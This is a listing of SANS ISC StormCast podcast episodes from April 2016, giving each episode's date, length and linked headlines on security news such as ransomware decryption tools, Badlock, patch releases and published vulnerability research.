URL Shorteners Weaken Random URLs http://arxiv.org/pdf/1604.02734v1.pdf
4/15/2016, 5 minutes, 50 seconds

ISC StormCast for Thursday, April 14th 2016 - Part 2

PFSense DShield Client Updated for PFSense Version 2.3 https://isc.sans.edu/forums/diary/Updated+PFSense+Client/20937/
JigSaw Decryption Tool Released http://www.bleepingcomputer.com/news/security/jigsaw-ransomware-decrypted-will-delete-your-files-until-you-pay-the-ransom/
Android Bluetooth Pairing Vulnerability https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-android-bluetooth-pairing-bypass-2016-04-12.pdf
Samsung Galaxy Phones Expose Modem via USB Port https://github.com/ud2/advisories/tree/master/android/samsung/nocve-2016-0004
4/14/2016, 5 minutes, 21 seconds

ISC StormCast for Thursday, April 14th 2016

Badlock not as bad https://isc.sans.edu/forums/diary/BadLock+Vulnerability+CVE20162118/20933/
Microsoft Patches https://isc.sans.edu/forums/diary/Microsoft+Patch+Tuesday+Summary+for+April+2016+httpsiscsansedumspatchdayshtmlviewday20160412/20935
4/14/2016, 7 minutes, 28 seconds

ISC StormCast for Tuesday, April 12th 2016

Petya Ransomware Decrypted https://isc.sans.edu/forums/diary/Tool+Released+to+Decrypt+Petya+Ransomware+Infected+Disks/20929/
Malware Creator Bribes Anti-Virus Vendors http://blog.checkpoint.com/2016/04/08/qihoo-360-just-the-tip-of-the-whitelisted-malware-iceberg/
Users Will Plug in USB Drives They Find In The Parking Lot https://www.elie.net/publication/users-really-do-plug-in-usb-drives-they-find
Ruby Gems Replacement Vulnerability http://blog.rubygems.org/2016/04/06/gem-replacement-vulnerability-and-mitigation.html
4/12/2016, 5 minutes, 39 seconds

ISC StormCast for Sunday, April 10th 2016

Flash Releases Pre-Announced Emergency Patch https://helpx.adobe.com/security/products/flash-player/apsb16-10.html http://blog.trendmicro.com/trendlabs-security-intelligence/look-adobe-flash-player-cve-2016-1019-zero-day-vulnerability/
Wordpress Will Start Using SSL https://en.blog.wordpress.com/2016/04/08/https-everywhere-encryption-for-all-wordpress-com-sites/
iMessage Vulnerability Allows Access To Chat History https://www.bishopfox.com/blog/2016/04/if-you-cant-break-crypto-break-the-client-recovery-of-plaintext-imessage-data/
Ubuntu on Windows 10: Not as Insecure as Some Think http://www.pcworld.com/article/3051604/windows/linuxs-deadliest-command-doesnt-faze-bash-on-windows-10.html
Special Badlock Webcast https://www.sans.org/webcasts/badlock-102107
4/10/2016, 6 minutes, 33 seconds

ISC StormCast for Friday, April 8th 2016

Google/Facebook CAPTCHA Broken Again https://www.blackhat.com/docs/asia-16/materials/asia-16-Sivakorn-Im-Not-a-Human-Breaking-the-Google-reCAPTCHA-wp.pdf
Updated FBI Damage Numbers For Business E-Mail Compromise https://www.fbi.gov/phoenix/press-releases/2016/fbi-warns-of-dramatic-increase-in-business-e-mail-scams
PowerWare / PoshCoder Ransomware Decryption https://www.alienvault.com/open-threat-exchange/blog/powerware-or-poshcoder-comparison-and-decryption
Leaking Information Via Browser XSS Filters http://www.mbsd.jp/blog/20160407.html
4/8/2016, 5 minutes, 37 seconds

ISC StormCast for Thursday, April 7th 2016

Cisco Security Advisory https://tools.cisco.com/security/center/publicationListing.x#~CiscoSecurityAdvisory
OSVDB Closes Down https://blog.osvdb.org/2016/04/05/osvdb-fin/
Apple iOS Passcode Bypass Vulnerability http://seclists.org/fulldisclosure/2016/Apr/19
Securing the Human: Ouch Newsletter https://securingthehuman.sans.org/resources/newsletters/ouch/2016
4/7/2016, 4 minutes, 50 seconds

ISC StormCast for Wednesday, April 6th 2016

New Microsoft Patches API https://isc.sans.edu/forums/diary/New+Features+for+Microsoft+Patch+Data/20911/
BadLock Webcast https://www.sans.org/webcasts/badlock-102107
Microsoft Single Signon Vulnerable to Token Hijacking https://whitton.xyz/articles/obtaining-tokens-outlook-office-azure-account/
Domino's Pizza Mobile App Payment Bypass http://www.ifc0nfig.com/dominos-pizza-and-payments/
4/6/2016, 6 minutes, 14 seconds

ISC StormCast for Tuesday, April 5th 2016

Android Patch Monday https://source.android.com/security/bulletin/2016-04-02.html
Jenkins Continuous Integration Tool Leaks Anonymous Usage Data https://jenkins.io/blog/2016/03/30/usage-statistics-privacy-advisory/
BREACH Attack Revived/Improved audio: https://regmedia.co.uk/2016/04/04/podcast_beast_2_bhasia.mp3 slides: https://www.blackhat.com/docs/asia-16/materials/asia-16-Karakostas-Practical-New-Developments-In-The-BREACH-Attack.pdf
4/5/2016, 4 minutes, 54 seconds

ISC StormCast for Monday, April 4th 2016

Tips for Stopping Ransomware https://isc.sans.edu/forums/diary/Tips+for+Stopping+Ransomware/20903/
Vulnerability in Lhasa decompression library http://blog.talosintel.com/2016/03/vulnerability-lhasa.html
How to Decrypt Kimcilware Encrypted Files http://blog.fortinet.com/post/kimcilware-ransomware-how-to-decrypt-encrypted-files-and-who-is-behind-it
Fileless Malware http://blog.airbuscybersecurity.com/post/2016/03/FILELESS-MALWARE- -A-BEHAVIOURAL-ANALYSIS-OF-KOVTER-PERSISTENCE
4/4/2016, 5 minutes, 33 seconds

ISC StormCast for Friday, April 1st 2016

Trend Micro Leaves Remote Debugger in Password Manager https://bugs.chromium.org/p/project-zero/issues/detail?id=773&can=1&q=trend
Several Palo Alto Vulnerabilities https://www.troopers.de/media/filer_public/a5/4d/a54da07e-3780-4f83-b4ac-8c620666a60a/paloalto_troopers.pdf
Bypassing The iOS Gatekeeper https://www.checkpoint.com/resources/sidestepper-ios-vulnerability/iOS_Vulnerability_Report_160330_A.pdf
4/1/2016, 5 minutes, 30 seconds